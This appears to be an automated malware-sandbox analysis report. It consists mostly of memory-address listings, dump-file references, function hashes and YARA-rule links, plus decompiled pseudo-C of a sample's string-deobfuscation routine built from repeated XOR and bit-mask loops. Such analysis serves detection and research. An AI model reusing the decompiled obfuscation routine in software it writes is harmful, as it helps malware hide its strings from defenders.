                                                                                                                                                        0x00000000
                                                                                                                                                        0x012dade5
                                                                                                                                                        0x012daacc
                                                                                                                                                        0x012daf41
                                                                                                                                                        0x012db510
                                                                                                                                                        0x012db510
                                                                                                                                                        0x00000000
                                                                                                                                                        0x012db515
                                                                                                                                                        0x012daf4c
                                                                                                                                                        0x012daf52
                                                                                                                                                        0x012daf5b
                                                                                                                                                        0x012daf6e
                                                                                                                                                        0x012daf6e
                                                                                                                                                        0x00000000
                                                                                                                                                        0x012daf4c
                                                                                                                                                        0x012daad7
                                                                                                                                                        0x012db132
                                                                                                                                                        0x012db137
                                                                                                                                                        0x012db13c
                                                                                                                                                        0x00000000
                                                                                                                                                        0x012db13c
                                                                                                                                                        0x012daae2
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x012daaf0
                                                                                                                                                        0x012daaf4
                                                                                                                                                        0x012daaf9
                                                                                                                                                        0x012dab01
                                                                                                                                                        0x012dab09
                                                                                                                                                        0x012dab11
                                                                                                                                                        0x012dab19
                                                                                                                                                        0x012dab21
                                                                                                                                                        0x012dab29
                                                                                                                                                        0x012dab31
                                                                                                                                                        0x012dab39
                                                                                                                                                        0x012dab41
                                                                                                                                                        0x012dab49
                                                                                                                                                        0x012dab51
                                                                                                                                                        0x012dab59
                                                                                                                                                        0x012dab61
                                                                                                                                                        0x012dab6c
                                                                                                                                                        0x012dab77
                                                                                                                                                        0x012dab82
                                                                                                                                                        0x012dab8d
                                                                                                                                                        0x012dab98
                                                                                                                                                        0x012daba3
                                                                                                                                                        0x012dabae
                                                                                                                                                        0x012dabb9
                                                                                                                                                        0x012dabc4
                                                                                                                                                        0x012dabcf
                                                                                                                                                        0x012dabda
                                                                                                                                                        0x012dabe5
                                                                                                                                                        0x012dabf0
                                                                                                                                                        0x012dabfb
                                                                                                                                                        0x012dac06
                                                                                                                                                        0x012dac11
                                                                                                                                                        0x012dac1c
                                                                                                                                                        0x012dac27
                                                                                                                                                        0x012dac37
                                                                                                                                                        0x012dac64
                                                                                                                                                        0x012dac64
                                                                                                                                                        0x012dac69
                                                                                                                                                        0x012dac71
                                                                                                                                                        0x012dac79
                                                                                                                                                        0x012dac7e
                                                                                                                                                        0x012dac83
                                                                                                                                                        0x012dac8b
                                                                                                                                                        0x012dac90
                                                                                                                                                        0x012dac95
                                                                                                                                                        0x00000000
                                                                                                                                                        0x012dac39
                                                                                                                                                        0x012dac3b
                                                                                                                                                        0x012dac57
                                                                                                                                                        0x012dac5b
                                                                                                                                                        0x012dac5e
                                                                                                                                                        0x00000000
                                                                                                                                                        0x012dac3b
                                                                                                                                                        0x012dac37
                                                                                                                                                        0x012da9ca
                                                                                                                                                        0x012dad13
                                                                                                                                                        0x012db524
                                                                                                                                                        0x00000000
                                                                                                                                                        0x012db524
                                                                                                                                                        0x012dad1e
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x012dad29
                                                                                                                                                        0x012dad2f
                                                                                                                                                        0x012dad2f
                                                                                                                                                        0x00000000
                                                                                                                                                        0x012dad29
                                                                                                                                                        0x012da9d5
                                                                                                                                                        0x012dae74
                                                                                                                                                        0x012db30f
                                                                                                                                                        0x012db313
                                                                                                                                                        0x012db318
                                                                                                                                                        0x012db320
                                                                                                                                                        0x012db328
                                                                                                                                                        0x012db330
                                                                                                                                                        0x012db338
                                                                                                                                                        0x012db340
                                                                                                                                                        0x012db348
                                                                                                                                                        0x012db350
                                                                                                                                                        0x012db358
                                                                                                                                                        0x012db360
                                                                                                                                                        0x012db368
                                                                                                                                                        0x012db370
                                                                                                                                                        0x012db378
                                                                                                                                                        0x012db380
                                                                                                                                                        0x012db38b
                                                                                                                                                        0x012db396
                                                                                                                                                        0x012db3a1
                                                                                                                                                        0x012db3ac
                                                                                                                                                        0x012db3b7
                                                                                                                                                        0x012db3c2
                                                                                                                                                        0x012db3cd
                                                                                                                                                        0x012db3d8
                                                                                                                                                        0x012db3e3
                                                                                                                                                        0x012db3ee
                                                                                                                                                        0x012db3f9
                                                                                                                                                        0x012db404
                                                                                                                                                        0x012db40f
                                                                                                                                                        0x012db41a
                                                                                                                                                        0x012db425
                                                                                                                                                        0x012db430
                                                                                                                                                        0x012db43b
                                                                                                                                                        0x012db44b
                                                                                                                                                        0x012db47a
                                                                                                                                                        0x012db47a
                                                                                                                                                        0x012db47f
                                                                                                                                                        0x012db48f
                                                                                                                                                        0x012db494
                                                                                                                                                        0x012db499
                                                                                                                                                        0x012db4a1
                                                                                                                                                        0x012db4ae
                                                                                                                                                        0x00000000
                                                                                                                                                        0x012db4ae
                                                                                                                                                        0x012db454
                                                                                                                                                        0x012db46a
                                                                                                                                                        0x012db46e
                                                                                                                                                        0x012db471
                                                                                                                                                        0x012db474
                                                                                                                                                        0x00000000
                                                                                                                                                        0x012db454
                                                                                                                                                        0x012dae7f
                                                                                                                                                        0x012daea2
                                                                                                                                                        0x012daea2
                                                                                                                                                        0x00000000
                                                                                                                                                        0x012dae7f
                                                                                                                                                        0x012da9e0
                                                                                                                                                        0x012daf96
                                                                                                                                                        0x012daf9b
                                                                                                                                                        0x012dafa3
                                                                                                                                                        0x012dafa8
                                                                                                                                                        0x012dafb0
                                                                                                                                                        0x012dafb8
                                                                                                                                                        0x012dafc5
                                                                                                                                                        0x012daffa
                                                                                                                                                        0x012daffa
                                                                                                                                                        0x012db00a
                                                                                                                                                        0x012db015
                                                                                                                                                        0x012db01a
                                                                                                                                                        0x00000000
                                                                                                                                                        0x012db01a
                                                                                                                                                        0x012dafce
                                                                                                                                                        0x012dafea
                                                                                                                                                        0x012dafee
                                                                                                                                                        0x012daff1
                                                                                                                                                        0x012daff4
                                                                                                                                                        0x00000000
                                                                                                                                                        0x012da9e6
                                                                                                                                                        0x012da9eb
                                                                                                                                                        0x012daa0b
                                                                                                                                                        0x012daa17
                                                                                                                                                        0x012daa1d
                                                                                                                                                        0x012daa23
                                                                                                                                                        0x012daa28
                                                                                                                                                        0x012daa30
                                                                                                                                                        0x012daa36
                                                                                                                                                        0x012daa43
                                                                                                                                                        0x012daa49
                                                                                                                                                        0x012daa4c
                                                                                                                                                        0x012daa52
                                                                                                                                                        0x012daa60
                                                                                                                                                        0x012daa60
                                                                                                                                                        0x00000000
                                                                                                                                                        0x012da9eb
                                                                                                                                                        0x012da9e0
                                                                                                                                                        0x012da9af

                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000005.00000002.368911222.00000000012D1000.00000020.00000001.sdmp, Offset: 012D0000, based on PE: true
                                                                                                                                                        • Associated: 00000005.00000002.368893013.00000000012D0000.00000002.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000005.00000002.368940818.00000000012E4000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000005.00000002.368999147.00000000012E7000.00000040.00000001.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID: =,$C2&$R52$U8
                                                                                                                                                        • API String ID: 0-961738214
                                                                                                                                                        • Opcode ID: 4e706b12c5a299a31bdf86c5b9ea6ba360387ec96d78adcbcf596322af4426cd
                                                                                                                                                        • Instruction ID: bfe931de8867ab72e2663253332ab2fdfda3355d685998c8da45a604578cdac0
                                                                                                                                                        • Opcode Fuzzy Hash: 4e706b12c5a299a31bdf86c5b9ea6ba360387ec96d78adcbcf596322af4426cd
                                                                                                                                                        • Instruction Fuzzy Hash: 8242AFB622D7C18ADB348F1AE45479EBBA1F3C5784F11451AEBCA8BB58DB79C0418F01
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 00007FFD696B3508, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 164COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • _invalid_parameter_noinfo.LIBCMT ref: 00007FFD696B3538
                                                                                                                                                          • Part of subcall function 00007FFD696B33D4: IsProcessorFeaturePresent.KERNEL32(?,?,?,?,00007FFD696B33B1), ref: 00007FFD696B33DD
                                                                                                                                                          • Part of subcall function 00007FFD696B33D4: GetCurrentProcess.KERNEL32(?,?,?,?,00007FFD696B33B1), ref: 00007FFD696B3402
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000005.00000002.369882428.00007FFD696A1000.00000020.00020000.sdmp, Offset: 00007FFD696A0000, based on PE: true
                                                                                                                                                        • Associated: 00000005.00000002.369865940.00007FFD696A0000.00000002.00020000.sdmp Download File
                                                                                                                                                        • Associated: 00000005.00000002.369900853.00007FFD696BA000.00000002.00020000.sdmp Download File
                                                                                                                                                        • Associated: 00000005.00000002.369921866.00007FFD696CD000.00000004.00020000.sdmp Download File
                                                                                                                                                        • Associated: 00000005.00000002.369945199.00007FFD696CF000.00000002.00020000.sdmp Download File
                                                                                                                                                        • Associated: 00000005.00000002.369953900.00007FFD696D1000.00000002.00020000.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: CurrentFeaturePresentProcessProcessor_invalid_parameter_noinfo
                                                                                                                                                        • String ID: *?$.
                                                                                                                                                        • API String ID: 4036615347-3972193922
                                                                                                                                                        • Opcode ID: fdab983c2e3d3385578c35eda9020d5246adb01500676316764ef2fd7356c748
                                                                                                                                                        • Instruction ID: 945f426632f4618563a614d47ba4b15b53a35b65231ffc6ebddbbbebc4608841
                                                                                                                                                        • Opcode Fuzzy Hash: fdab983c2e3d3385578c35eda9020d5246adb01500676316764ef2fd7356c748
                                                                                                                                                        • Instruction Fuzzy Hash: 1D51D3A2B16F95C6EB14DFA299208B967A4FB58BDCB444531DE1D07B89FE3CD0628301
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 00007FFD696B3714, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 101COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000005.00000002.369882428.00007FFD696A1000.00000020.00020000.sdmp, Offset: 00007FFD696A0000, based on PE: true
                                                                                                                                                        • Associated: 00000005.00000002.369865940.00007FFD696A0000.00000002.00020000.sdmp Download File
                                                                                                                                                        • Associated: 00000005.00000002.369900853.00007FFD696BA000.00000002.00020000.sdmp Download File
                                                                                                                                                        • Associated: 00000005.00000002.369921866.00007FFD696CD000.00000004.00020000.sdmp Download File
                                                                                                                                                        • Associated: 00000005.00000002.369945199.00007FFD696CF000.00000002.00020000.sdmp Download File
                                                                                                                                                        • Associated: 00000005.00000002.369953900.00007FFD696D1000.00000002.00020000.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID: .
                                                                                                                                                        • API String ID: 0-248832578
                                                                                                                                                        • Opcode ID: 10405c8d8ddb9375c22caa89a562532f531efe3896400207136dcccf82c4e9db
                                                                                                                                                        • Instruction ID: eecd5dd2c0d4f391f78fa12dd6a6e448995e5b400efa48e920b987eb74fa1ac6
                                                                                                                                                        • Opcode Fuzzy Hash: 10405c8d8ddb9375c22caa89a562532f531efe3896400207136dcccf82c4e9db
                                                                                                                                                        • Instruction Fuzzy Hash: EC3132A1B05F9186F7209EA39814AB66B51FB44FE8F548730EE6C07BC9EE3CD1118305
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 00007FFD696B8E18, Relevance: 3.2, APIs: 2, Instructions: 227COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000005.00000002.369882428.00007FFD696A1000.00000020.00020000.sdmp, Offset: 00007FFD696A0000, based on PE: true
                                                                                                                                                        • Associated: 00000005.00000002.369865940.00007FFD696A0000.00000002.00020000.sdmp Download File
                                                                                                                                                        • Associated: 00000005.00000002.369900853.00007FFD696BA000.00000002.00020000.sdmp Download File
                                                                                                                                                        • Associated: 00000005.00000002.369921866.00007FFD696CD000.00000004.00020000.sdmp Download File
                                                                                                                                                        • Associated: 00000005.00000002.369945199.00007FFD696CF000.00000002.00020000.sdmp Download File
                                                                                                                                                        • Associated: 00000005.00000002.369953900.00007FFD696D1000.00000002.00020000.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: ExceptionRaise_clrfp
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 15204871-0
                                                                                                                                                        • Opcode ID: 2123af3bc8b75ac2e9e39e5d18f4f5283c8742fd0ceed7cde3ebc703b1048950
                                                                                                                                                        • Instruction ID: df3bb4c902737e504d5bb8c91b0c38fb19a4de83397ce54172741f28dec49ff1
                                                                                                                                                        • Opcode Fuzzy Hash: 2123af3bc8b75ac2e9e39e5d18f4f5283c8742fd0ceed7cde3ebc703b1048950
                                                                                                                                                        • Instruction Fuzzy Hash: A0B139B3604B89CAEB15CF29C8963683BA0F784B8CF158925DB5D837A8DB39D461C701
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 012DFC4D, Relevance: 2.8, Strings: 2, Instructions: 332COMMONCrypto
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                        			E012DFC4D(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags, long long __rax, void* __rcx, signed long long __r8, signed long long __r9, void* __r11) {
				char _v20;
				void* _t137;
				void* _t139;
				void* _t141;
				void* _t143;
				void* _t145;
				void* _t147;
				void* _t149;
				void* _t151;
				void* _t153;
				void* _t155;
				void* _t157;
				void* _t159;
				signed int _t186;
				signed int _t190;
				signed int _t194;
				signed int _t197;
				signed int _t201;
				signed int _t204;
				signed int _t208;
				signed int _t211;
				signed int _t214;
				signed int _t218;
				signed int _t221;
				signed int _t225;
				long long _t268;
				intOrPtr* _t282;
				intOrPtr* _t283;
				intOrPtr* _t284;
				intOrPtr* _t285;
				intOrPtr* _t286;
				intOrPtr* _t287;
				intOrPtr* _t288;
				intOrPtr* _t289;
				intOrPtr* _t290;
				intOrPtr* _t291;
				intOrPtr* _t292;
				intOrPtr* _t293;
				void* _t294;
				signed long long _t295;
				signed long long _t296;

				_t296 = __r9;
				_t295 = __r8;
				_t268 = __rax;
				E012DEB92(__edx, __edi, __rax, __rcx, __r8, __r11);
				_t137 = E012DCDB9(0xd, __rax);
				 *0x12e5038 = _t268;
				_t282 =  &_v20;
				 *((char*)(_t282 - 4)) = 0;
				 *_t282 = 0x5c8b08b7;
				 *((intOrPtr*)(_t282 + 4)) = 0xca01b9;
				 *((intOrPtr*)(_t282 + 8)) = 0x5e9509f2;
				 *((intOrPtr*)(_t282 + 0xc)) = 0x32f96ddc;
				if( *((intOrPtr*)(_t282 - 4)) == 0) {
					r8d = 0;
					do {
						_t225 =  *(_t294 + 0x24 + _t295 * 4);
						r9d = _t225;
						r9d =  !r9d;
						r9d = r9d & 0x32f96ddc;
						 *(_t294 + 0x24 + _t295 * 4) = _t225 & 0xcd069223 | r9d;
						_t295 = _t295 + 1;
					} while (_t295 != 4);
				}
				r8d = 0xd;
				E012DC96E(_t137, _t268, _t282);
				_t139 = E012DCDB9(0xd, _t268);
				 *0x12e5040 = _t268;
				_t283 =  &_v20;
				 *((char*)(_t283 - 4)) = 0;
				 *_t283 = 0x74ede2e4;
				 *((intOrPtr*)(_t283 + 4)) = 0x27a8eff5;
				 *((intOrPtr*)(_t283 + 8)) = 0x79f7e2ab;
				 *((intOrPtr*)(_t283 + 0xc)) = 0x159b8685;
				if( *((intOrPtr*)(_t283 - 4)) == 0) {
					r8d = 0;
					do {
						_t221 =  *(_t294 + 0x24 + _t295 * 4);
						r9d = _t221;
						r9d =  !r9d;
						r9d = r9d & 0x5b537122;
						 *(_t294 + 0x24 + _t295 * 4) = (_t221 & 0xa4ac8edd | r9d) ^ 0x4ec8f7a7;
						_t295 = _t295 + 1;
					} while (_t295 != 4);
				}
				r8d = 0xd;
				E012DC96E(_t139, _t268, _t283);
				_t141 = E012DCDB9(0xb, _t268);
				 *0x12e5048 = _t268;
				_t284 =  &_v20;
				 *((char*)(_t284 - 4)) = 0;
				 *_t284 = 0x67f9f6b1;
				 *((intOrPtr*)(_t284 + 4)) = 0x71b2b7f7;
				 *((intOrPtr*)(_t284 + 8)) = 0x159ce9a8;
				if( *((intOrPtr*)(_t284 - 4)) == 0) {
					r9d = 1;
					r8d = 0;
					do {
						_t218 =  *(_t294 + 0x20 + _t296 * 4);
						r10d = _t218;
						r10d =  !r10d;
						r10d = r10d & 0x159c85c4;
						 *(_t294 + 0x20 + _t296 * 4) = _t218 & 0xea637a3b | r10d;
						_t295 = _t295 + 1;
						_t296 = _t296 + 1;
					} while (_t296 != 4);
				}
				r8d = 0xb;
				E012DC96E(_t141, _t268, _t284);
				_t143 = E012DCDB9(0xb, _t268);
				 *0x12e5050 = _t268;
				_t285 =  &_v20;
				 *((char*)(_t285 - 4)) = 0;
				 *_t285 = 0x82075aa;
				 *((intOrPtr*)(_t285 + 4)) = 0x333c34ee;
				 *((intOrPtr*)(_t285 + 8)) = 0x57126ab1;
				if( *((intOrPtr*)(_t285 - 4)) == 0) {
					r9d = 1;
					r8d = 0;
					do {
						_t214 =  *(_t294 + 0x20 + _t296 * 4);
						r10d = _t214;
						r10d =  !r10d;
						r10d = r10d & 0x3b1dfd70;
						 *(_t294 + 0x20 + _t296 * 4) = (_t214 & 0xc4e2028f | r10d) ^ 0x6c0ffbad;
						_t295 = _t295 + 1;
						_t296 = _t296 + 1;
					} while (_t296 != 4);
				}
				r8d = 0xb;
				E012DC96E(_t143, _t268, _t285);
				_t145 = E012DCDB9(0xa, _t268);
				 *0x12e5058 = _t268;
				_t286 =  &_v20;
				 *((char*)(_t286 - 4)) = 0;
				 *_t286 = 0xce4e345;
				 *((intOrPtr*)(_t286 + 4)) = 0xce4b947;
				 *((intOrPtr*)(_t286 + 8)) = 0x60809747;
				if( *((intOrPtr*)(_t286 - 4)) == 0) {
					r9d = 1;
					r8d = 0;
					do {
						_t211 =  *(_t294 + 0x20 + _t296 * 4);
						r10d = _t211;
						r10d =  !r10d;
						r10d = r10d & 0x6080972b;
						 *(_t294 + 0x20 + _t296 * 4) = _t211 & 0x9f7f68d4 | r10d;
						_t295 = _t295 + 1;
						_t296 = _t296 + 1;
					} while (_t296 != 4);
				}
				r8d = 0xa;
				E012DC96E(_t145, _t268, _t286);
				_t147 = E012DCDB9(0xc, _t268);
				 *0x12e5060 = _t268;
				_t287 =  &_v20;
				 *((char*)(_t287 - 4)) = 0;
				 *_t287 = 0x7621e07d;
				 *((intOrPtr*)(_t287 + 4)) = 0x3476bb62;
				 *((intOrPtr*)(_t287 + 8)) = 0x1a28e46a;
				if( *((intOrPtr*)(_t287 - 4)) == 0) {
					r9d = 1;
					r8d = 0;
					do {
						_t208 =  *(_t294 + 0x20 + _t296 * 4);
						r10d = _t208;
						r10d =  !r10d;
						r10d = r10d & 0x1a44880e;
						 *(_t294 + 0x20 + _t296 * 4) = _t208 & 0xe5bb77f1 | r10d;
						_t295 = _t295 + 1;
						_t296 = _t296 + 1;
					} while (_t296 != 4);
				}
				r8d = 0xc;
				E012DC96E(_t147, _t268, _t287);
				_t149 = E012DCDB9(0xc, _t268);
				 *0x12e5068 = _t268;
				_t288 =  &_v20;
				 *((char*)(_t288 - 4)) = 0;
				 *_t288 = 0x79393d40;
				 *((intOrPtr*)(_t288 + 4)) = 0x27727c57;
				 *((intOrPtr*)(_t288 + 8)) = 0x92c2347;
				if( *((intOrPtr*)(_t288 - 4)) == 0) {
					r9d = 1;
					r8d = 0;
					do {
						_t204 =  *(_t294 + 0x20 + _t296 * 4);
						r10d = _t204;
						r10d =  !r10d;
						r10d = r10d & 0xdd4877ab;
						 *(_t294 + 0x20 + _t296 * 4) = (_t204 & 0x22b78854 | r10d) ^ 0xd4083888;
						_t295 = _t295 + 1;
						_t296 = _t296 + 1;
					} while (_t296 != 4);
				}
				r8d = 0xc;
				E012DC96E(_t149, _t268, _t288);
				_t151 = E012DCDB9(0xc, _t268);
				 *0x12e5070 = _t268;
				_t289 =  &_v20;
				 *((char*)(_t289 - 4)) = 0;
				 *_t289 = 0x2a67eaa6;
				 *((intOrPtr*)(_t289 + 4)) = 0x7362f2b4;
				 *((intOrPtr*)(_t289 + 8)) = 0x5d67eeb1;
				if( *((intOrPtr*)(_t289 - 4)) == 0) {
					r9d = 1;
					r8d = 0;
					do {
						_t201 =  *(_t294 + 0x20 + _t296 * 4);
						r10d = _t201;
						r10d =  !r10d;
						r10d = r10d & 0x5d0b82d5;
						 *(_t294 + 0x20 + _t296 * 4) = _t201 & 0xa2f47d2a | r10d;
						_t295 = _t295 + 1;
						_t296 = _t296 + 1;
					} while (_t296 != 4);
				}
				r8d = 0xc;
				E012DC96E(_t151, _t268, _t289);
				_t153 = E012DCDB9(0xc, _t268);
				 *0x12e5078 = _t268;
				_t290 =  &_v20;
				 *((char*)(_t290 - 4)) = 0;
				 *_t290 = 0x76d40483;
				 *((intOrPtr*)(_t290 + 4)) = 0x30ca1980;
				 *((intOrPtr*)(_t290 + 8)) = 0x1ed60190;
				if( *((intOrPtr*)(_t290 - 4)) == 0) {
					r9d = 1;
					r8d = 0;
					do {
						_t197 =  *(_t294 + 0x20 + _t296 * 4);
						r10d = _t197;
						r10d =  !r10d;
						r10d = r10d & 0xf14a1bba;
						 *(_t294 + 0x20 + _t296 * 4) = (_t197 & 0x0eb5e445 | r10d) ^ 0xeff0764e;
						_t295 = _t295 + 1;
						_t296 = _t296 + 1;
					} while (_t296 != 4);
				}
				r8d = 0xc;
				E012DC96E(_t153, _t268, _t290);
				_t155 = E012DCDB9(0xd, _t268);
				 *0x12e5080 = _t268;
				_t291 =  &_v20;
				 *((char*)(_t291 - 4)) = 0;
				 *_t291 = 0xfccb42;
				 *((intOrPtr*)(_t291 + 4)) = 0x53bbc75c;
				 *((intOrPtr*)(_t291 + 8)) = 0xde4ca02;
				 *((intOrPtr*)(_t291 + 0xc)) = 0x6188ae2c;
				if( *((intOrPtr*)(_t291 - 4)) == 0) {
					r8d = 0;
					do {
						_t194 =  *(_t294 + 0x24 + _t295 * 4);
						r9d = _t194;
						r9d =  !r9d;
						r9d = r9d & 0x6188ae2c;
						 *(_t294 + 0x24 + _t295 * 4) = _t194 & 0x9e7751d3 | r9d;
						_t295 = _t295 + 1;
					} while (_t295 != 4);
				}
				r8d = 0xd;
				E012DC96E(_t155, _t268, _t291);
				_t157 = E012DCDB9(0xb, _t268);
				 *0x12e5088 = _t268;
				_t292 =  &_v20;
				 *((char*)(_t292 - 4)) = 0;
				 *_t292 = 0x2d10a9d6;
				 *((intOrPtr*)(_t292 + 4)) = 0x304cbec4;
				 *((intOrPtr*)(_t292 + 8)) = 0x5462a6d8;
				if( *((intOrPtr*)(_t292 - 4)) == 0) {
					r9d = 1;
					r8d = 0;
					do {
						_t190 =  *(_t294 + 0x20 + _t296 * 4);
						r10d = _t190;
						r10d =  !r10d;
						r10d = r10d & 0xd6197a8a;
						 *(_t294 + 0x20 + _t296 * 4) = (_t190 & 0x29e68575 | r10d) ^ 0x827bb03e;
						_t295 = _t295 + 1;
						_t296 = _t296 + 1;
					} while (_t296 != 4);
				}
				r8d = 0xb;
				E012DC96E(_t157, _t268, _t292);
				_t159 = E012DCDB9(0xc, _t268);
				 *0x12e5090 = _t268;
				_t293 =  &_v20;
				 *((char*)(_t293 - 4)) = 0;
				 *_t293 = 0x538c9c19;
				 *((intOrPtr*)(_t293 + 4)) = 0xf9f8109;
				 *((intOrPtr*)(_t293 + 8)) = 0x21858308;
				if( *((intOrPtr*)(_t293 - 4)) == 0) {
					r9d = 1;
					r8d = 0;
					do {
						_t186 =  *(_t294 + 0x20 + _t296 * 4);
						r10d = _t186;
						r10d =  !r10d;
						r10d = r10d & 0x069e8086;
						 *(_t294 + 0x20 + _t296 * 4) = (_t186 & 0xf9617f79 | r10d) ^ 0x27776fea;
						_t295 = _t295 + 1;
						_t296 = _t296 + 1;
					} while (_t296 != 4);
				}
				r8d = 0xc;
				return E012DC96E(_t159, _t268, _t293);
			}












































                                                                                                                                                        0x012dfc4d
                                                                                                                                                        0x012dfc4d
                                                                                                                                                        0x012dfc4d
                                                                                                                                                        0x012dfc51
                                                                                                                                                        0x012dfc5b
                                                                                                                                                        0x012dfc60
                                                                                                                                                        0x012dfc69
                                                                                                                                                        0x012dfc6e
                                                                                                                                                        0x012dfc71
                                                                                                                                                        0x012dfc77
                                                                                                                                                        0x012dfc7e
                                                                                                                                                        0x012dfc85
                                                                                                                                                        0x012dfc8f
                                                                                                                                                        0x012dfc91
                                                                                                                                                        0x012dfc94
                                                                                                                                                        0x012dfc94
                                                                                                                                                        0x012dfc99
                                                                                                                                                        0x012dfc9c
                                                                                                                                                        0x012dfc9f
                                                                                                                                                        0x012dfcaf
                                                                                                                                                        0x012dfcb4
                                                                                                                                                        0x012dfcb7
                                                                                                                                                        0x012dfc94
                                                                                                                                                        0x012dfcc0
                                                                                                                                                        0x012dfcc6
                                                                                                                                                        0x012dfcd0
                                                                                                                                                        0x012dfcd5
                                                                                                                                                        0x012dfcde
                                                                                                                                                        0x012dfce3
                                                                                                                                                        0x012dfce6
                                                                                                                                                        0x012dfcec
                                                                                                                                                        0x012dfcf3
                                                                                                                                                        0x012dfcfa
                                                                                                                                                        0x012dfd04
                                                                                                                                                        0x012dfd06
                                                                                                                                                        0x012dfd09
                                                                                                                                                        0x012dfd09
                                                                                                                                                        0x012dfd0e
                                                                                                                                                        0x012dfd11
                                                                                                                                                        0x012dfd14
                                                                                                                                                        0x012dfd2a
                                                                                                                                                        0x012dfd2f
                                                                                                                                                        0x012dfd32
                                                                                                                                                        0x012dfd09
                                                                                                                                                        0x012dfd3b
                                                                                                                                                        0x012dfd41
                                                                                                                                                        0x012dfd4b
                                                                                                                                                        0x012dfd50
                                                                                                                                                        0x012dfd59
                                                                                                                                                        0x012dfd5e
                                                                                                                                                        0x012dfd61
                                                                                                                                                        0x012dfd67
                                                                                                                                                        0x012dfd6e
                                                                                                                                                        0x012dfd78
                                                                                                                                                        0x012dfd7a
                                                                                                                                                        0x012dfd80
                                                                                                                                                        0x012dfd83
                                                                                                                                                        0x012dfd83
                                                                                                                                                        0x012dfd88
                                                                                                                                                        0x012dfd8b
                                                                                                                                                        0x012dfd8e
                                                                                                                                                        0x012dfd9e
                                                                                                                                                        0x012dfda3
                                                                                                                                                        0x012dfda6
                                                                                                                                                        0x012dfda9
                                                                                                                                                        0x012dfd83
                                                                                                                                                        0x012dfdb2
                                                                                                                                                        0x012dfdb8
                                                                                                                                                        0x012dfdc2
                                                                                                                                                        0x012dfdc7
                                                                                                                                                        0x012dfdd0
                                                                                                                                                        0x012dfdd5
                                                                                                                                                        0x012dfdd8
                                                                                                                                                        0x012dfdde
                                                                                                                                                        0x012dfde5
                                                                                                                                                        0x012dfdef
                                                                                                                                                        0x012dfdf1
                                                                                                                                                        0x012dfdf7
                                                                                                                                                        0x012dfdfa
                                                                                                                                                        0x012dfdfa
                                                                                                                                                        0x012dfdff
                                                                                                                                                        0x012dfe02
                                                                                                                                                        0x012dfe05
                                                                                                                                                        0x012dfe1b
                                                                                                                                                        0x012dfe20
                                                                                                                                                        0x012dfe23
                                                                                                                                                        0x012dfe26
                                                                                                                                                        0x012dfdfa
                                                                                                                                                        0x012dfe2f
                                                                                                                                                        0x012dfe35
                                                                                                                                                        0x012dfe3f
                                                                                                                                                        0x012dfe44
                                                                                                                                                        0x012dfe4d
                                                                                                                                                        0x012dfe52
                                                                                                                                                        0x012dfe55
                                                                                                                                                        0x012dfe5b
                                                                                                                                                        0x012dfe62
                                                                                                                                                        0x012dfe6c
                                                                                                                                                        0x012dfe6e
                                                                                                                                                        0x012dfe74
                                                                                                                                                        0x012dfe77
                                                                                                                                                        0x012dfe77
                                                                                                                                                        0x012dfe7c
                                                                                                                                                        0x012dfe7f
                                                                                                                                                        0x012dfe82
                                                                                                                                                        0x012dfe92
                                                                                                                                                        0x012dfe97
                                                                                                                                                        0x012dfe9a
                                                                                                                                                        0x012dfe9d
                                                                                                                                                        0x012dfe77
                                                                                                                                                        0x012dfea6
                                                                                                                                                        0x012dfeac
                                                                                                                                                        0x012dfeb6
                                                                                                                                                        0x012dfebb
                                                                                                                                                        0x012dfec4
                                                                                                                                                        0x012dfec9
                                                                                                                                                        0x012dfecc
                                                                                                                                                        0x012dfed2
                                                                                                                                                        0x012dfed9
                                                                                                                                                        0x012dfee3
                                                                                                                                                        0x012dfee5
                                                                                                                                                        0x012dfeeb
                                                                                                                                                        0x012dfeee
                                                                                                                                                        0x012dfeee
                                                                                                                                                        0x012dfef3
                                                                                                                                                        0x012dfef6
                                                                                                                                                        0x012dfef9
                                                                                                                                                        0x012dff09
                                                                                                                                                        0x012dff0e
                                                                                                                                                        0x012dff11
                                                                                                                                                        0x012dff14
                                                                                                                                                        0x012dfeee
                                                                                                                                                        0x012dff1d
                                                                                                                                                        0x012dff23
                                                                                                                                                        0x012dff2d
                                                                                                                                                        0x012dff32
                                                                                                                                                        0x012dff3b
                                                                                                                                                        0x012dff40
                                                                                                                                                        0x012dff43
                                                                                                                                                        0x012dff49
                                                                                                                                                        0x012dff50
                                                                                                                                                        0x012dff5a
                                                                                                                                                        0x012dff5c
                                                                                                                                                        0x012dff62
                                                                                                                                                        0x012dff65
                                                                                                                                                        0x012dff65
                                                                                                                                                        0x012dff6a
                                                                                                                                                        0x012dff6d
                                                                                                                                                        0x012dff70
                                                                                                                                                        0x012dff86
                                                                                                                                                        0x012dff8b
